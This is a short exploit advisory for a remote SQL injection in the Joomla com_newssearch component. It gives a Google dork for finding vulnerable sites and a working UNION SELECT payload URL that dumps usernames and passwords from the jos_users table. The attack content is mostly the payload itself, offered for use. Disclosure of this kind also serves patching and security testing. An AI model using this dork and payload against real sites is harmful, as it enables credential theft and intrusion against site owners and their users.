The Joomla Newssearch component suffers from a remote SQL injection vulnerability.
e08a245d1afb0fb4e8e8b9fe2827811c26656f4f723b2a8af2930afc4eaa2a23
# Exploit Title: Joomla Component (com_newssearch) SQL Injection Vulnerability
# Google Dork: allinurl: index.php?com_newssearch
# Date: 7/15/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: id=
##############################################################
Exploit:
http://www.example.com/index.php?option=com_newssearch&type=detail§ion=2&id=15'
http://www.example.com/index.php?option=com_newssearch&type=detail§ion=2&id=-1 union all select group_concat(username,0x3a,password,0x0a),2,3,4 from jos_users
##############################################################
www.websiteauditing.org
www.areyousecure.net
# Shouts to the Belegit crew